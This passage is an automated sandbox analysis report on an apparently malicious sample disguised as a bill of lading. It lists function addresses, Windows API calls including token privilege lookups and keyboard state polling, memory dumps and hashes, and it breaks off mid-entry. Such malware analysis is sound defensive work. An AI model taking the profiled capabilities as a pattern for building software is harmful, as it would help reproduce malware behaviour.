                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                      • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                      • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                      • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                                      Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 136442275-0
                                                                                                                      • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                      • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                      • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                      • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                      Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 535477410-2761332787
                                                                                                                      • Opcode ID: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
                                                                                                                      • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                      • Opcode Fuzzy Hash: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
                                                                                                                      • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                      Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                      • _wcslen.LIBCMT ref: 00460502
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                      • String ID: ThumbnailClass
                                                                                                                      • API String ID: 4123061591-1241985126
                                                                                                                      • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                      • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                      • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                      • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                      Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                        • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                        • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                        • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                      • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                      • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                      • API String ID: 2483343779-2060113733
                                                                                                                      • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                      • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                      • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                      • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                      Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                      • String ID: 2
                                                                                                                      • API String ID: 1331449709-450215437
                                                                                                                      • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                      • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                      • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                      • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                      Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 3375834691-2160076837
                                                                                                                      • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                      • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                                      • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                      • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                                      Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                      • _memcmp.LIBCMT ref: 004394A9
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                      Strings
                                                                                                                      • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                      • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                      • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                      • API String ID: 1446985595-805462909
                                                                                                                      • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                      • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                      • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                      • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                      Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                      • API String ID: 2907320926-41864084
                                                                                                                      • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                      • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                      • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                      • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                      Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1932665248-0
                                                                                                                      • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                      • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                      • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                      • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                      Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                      • _memset.LIBCMT ref: 004481BA
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                      • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                      • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                      • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                      • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                      Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                      • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                      • DeleteObject.GDI32(003D0000), ref: 0046EB4F
                                                                                                                      • DestroyIcon.USER32(006F0043), ref: 0046EB67
                                                                                                                      • DeleteObject.GDI32(17690002), ref: 0046EB7F
                                                                                                                      • DestroyWindow.USER32(00450053), ref: 0046EB97
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 802431696-0
                                                                                                                      • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                      • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                      • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                      • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                      Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                      • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                      • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                      Memory Dump Source
